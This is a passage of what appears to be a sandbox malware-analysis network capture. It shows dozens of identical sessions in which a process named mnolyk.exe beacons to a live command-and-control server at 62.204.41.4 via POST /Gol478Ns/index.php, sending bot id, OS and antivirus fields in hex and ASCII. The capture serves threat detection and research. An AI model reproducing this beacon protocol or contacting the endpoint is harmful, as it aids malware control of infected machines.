601	192.168.2.5	50314	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:53.406802893 CET	846	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:53.470809937 CET	846	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
602	192.168.2.5	50315	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:53.640304089 CET	847	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:53.704029083 CET	847	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
603	192.168.2.5	50316	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:53.881598949 CET	848	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:53.946224928 CET	848	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
604	192.168.2.5	50317	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:54.125433922 CET	849	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:54.191246986 CET	849	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
605	192.168.2.5	50318	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:54.361124039 CET	850	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:54.426115990 CET	850	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
606	192.168.2.5	50319	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:54.594852924 CET	851	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:54.658057928 CET	851	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
607	192.168.2.5	50320	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:54.828974962 CET	852	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:54.893963099 CET	852	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
608	192.168.2.5	50321	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:55.064377069 CET	853	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:55.129900932 CET	853	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
609	192.168.2.5	50322	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:55.303212881 CET	854	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:55.369685888 CET	854	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.5	49766	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:21.096100092 CET	252	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:21.163320065 CET	253	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
610	192.168.2.5	50323	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:55.559778929 CET	855	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:55.626883984 CET	855	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
611	192.168.2.5	50324	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:55.796736956 CET	856	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:55.859814882 CET	856	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
612	192.168.2.5	50325	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:56.050544977 CET	857	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:56.116780043 CET	857	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
613	192.168.2.5	50326	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:56.296799898 CET	858	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:56.359690905 CET	858	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
614	192.168.2.5	50327	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:56.530972004 CET	859	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:56.593581915 CET	859	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
615	192.168.2.5	50328	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:56.770342112 CET	860	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:56.835864067 CET	860	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
616	192.168.2.5	50329	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:57.013885021 CET	861	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:57.078119993 CET	861	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
617	192.168.2.5	50330	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:57.254967928 CET	862	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:57.318006039 CET	862	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
618	192.168.2.5	50331	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:57.512461901 CET	863	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:57.575320959 CET	863	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
619	192.168.2.5	50332	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:57.750216007 CET	864	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:57.814187050 CET	864	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.5	49768	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:21.340553999 CET	253	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:21.406193018 CET	254	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
620	192.168.2.5	50333	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:57.984721899 CET	865	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
